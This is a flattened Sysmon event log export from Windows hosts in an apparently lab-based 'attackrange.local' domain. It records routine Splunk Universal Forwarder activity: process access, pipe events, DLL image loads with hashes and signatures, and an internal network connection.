Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001606438Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.933{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001606437Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.934{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001606436Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:32.933{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606435Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:32.933{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001606434Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:32.933{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606433Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:32.933{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001606432Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:32.933{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606431Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:32.933{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x80000000000000001606430Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.717{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606429Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.717{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22677CF96FD3C0E99F4D4BFCD37E6721,SHA256=66694DA061DDD5EB8935C6CCA30955821D5601ACA9628D485C21F07B693A8CFCfalsefalse - insufficient disk space 11241100x80000000000000001606428Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.699{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606427Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.699{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F88AB6EB0659E72505120E93E20F091F,SHA256=DE505A3121DAB22EB76DF5FFD938BBE1B81B1818E660CC04F46AAA6FE62D4EE0falsefalse - insufficient disk space 354300x80000000000000001095249Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:27.716{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1157-false10.0.1.12-8089- 23542300x80000000000000001095248Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:32.593{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0532005CD4FF43A4C2B738D8004B72B,SHA256=64672BC31A462945A2095116DA1B5AB8163348C998BDE2B3D00E418824AF6EEE,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606426Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.664{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606425Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.664{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E31B066771D696E713EA23B58FE285B4,SHA256=92A26A1EABA9E3906CE4A8397FCA6C7CE00CADDCD92776028E3D27036D877F44falsefalse - insufficient disk space 534500x80000000000000001606424Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.401{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x80000000000000001606423Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.401{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001606422Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.401{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001606421Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.401{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x80000000000000001606420Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.279{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001606419Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001606418Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001606417Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x80000000000000001606416Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001606415Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x80000000000000001606414Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001606413Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001606412Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001606411Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001606410Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001606409Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001606408Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001606407Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001606406Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001606405Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\winspool.drv10.0.14393.4169 (rs1_release.210107-1130)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=D21FAA584F844E61375D95B5BE9115EE,SHA256=E221EA0081FDE7AAAD71A38016A8D470082B3732E9ED2D8ED7C97E9F41AF0045trueMicrosoft WindowsValid 734700x80000000000000001606404Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001606403Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001606402Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001606401Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001606400Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001606399Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001606398Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001606397Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001606396Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001606395Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001606394Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001606393Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001606392Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001606391Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001606390Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001606389Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001606388Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001606387Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 734700x80000000000000001606386Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001606385Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 